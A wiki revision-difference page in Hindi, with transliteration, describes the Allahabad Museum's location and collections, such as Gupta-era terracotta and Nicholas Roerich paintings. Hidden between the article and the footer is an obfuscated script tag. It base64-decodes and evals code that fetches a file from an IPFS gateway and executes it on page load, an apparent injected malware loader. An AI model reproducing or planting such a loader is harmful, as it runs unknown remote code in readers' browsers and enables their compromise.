Difference between revisions of "इलाहाबाद संग्रहालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:संग्रहालय (को हटा दिया गया हैं।))
m (Text replace - "चीजें" to "चीज़ें")
Line 1: Line 1:
 
*इलाहाबाद संग्रहालय [[उत्तर प्रदेश]] के [[इलाहाबाद]] शहर में स्थित है।  
 
*इलाहाबाद संग्रहालय [[उत्तर प्रदेश]] के [[इलाहाबाद]] शहर में स्थित है।  
 
*इलाहाबाद संग्रहालय चन्द्र शेखर आज़ाद पार्क के निकट स्थित है।
 
*इलाहाबाद संग्रहालय चन्द्र शेखर आज़ाद पार्क के निकट स्थित है।
*इलाहाबाद संग्रहालय में [[गुप्त साम्राज्य]] के समय की टेराकोटा एवं वास्तुकला की चीजें प्रदर्शीत हैं।
+
*इलाहाबाद संग्रहालय में [[गुप्त साम्राज्य]] के समय की टेराकोटा एवं वास्तुकला की चीज़ें प्रदर्शीत हैं।
 
*इलाहाबाद संग्रहालय में हल्दार, साज़िद काश्तगीर, जामिनी रॉय, निकोलस रोहरिच एवं तिब्बती लामा थेंकास निर्मित वस्तुएँ भी प्रदर्शीत है।
 
*इलाहाबाद संग्रहालय में हल्दार, साज़िद काश्तगीर, जामिनी रॉय, निकोलस रोहरिच एवं तिब्बती लामा थेंकास निर्मित वस्तुएँ भी प्रदर्शीत है।
 
*इलाहाबाद संग्रहालय का मुख्य आकर्षण निकोलस रोरिच की पेंटिग्स, राजस्थानी लघु आकृतियाँ, सिक्कों और दूसरी शताब्दी से आधुनिक युग की पत्थरों की मूर्तियों के लिए प्रसिद्ध है।  
 
*इलाहाबाद संग्रहालय का मुख्य आकर्षण निकोलस रोरिच की पेंटिग्स, राजस्थानी लघु आकृतियाँ, सिक्कों और दूसरी शताब्दी से आधुनिक युग की पत्थरों की मूर्तियों के लिए प्रसिद्ध है।  

Revision as of 08:09, 8 July 2011

  • ilahabad sangrahalay uttar pradesh ke ilahabad shahar mean sthit hai.
  • ilahabad sangrahalay chandr shekhar azad park ke nikat sthit hai.
  • ilahabad sangrahalay mean gupt samrajy ke samay ki terakota evan vastukala ki chizean pradarshit haian.
  • ilahabad sangrahalay mean haldar, sazid kashtagir, jamini r aauy, nikolas roharich evan tibbati lama theankas nirmit vastuean bhi pradarshit hai.
  • ilahabad sangrahalay ka mukhy akarshan nikolas rorich ki peantigs, rajasthani laghu akritiyaan, sikkoan aur doosari shatabdi se adhunik yug ki pattharoan ki moortiyoan ke lie prasiddh hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh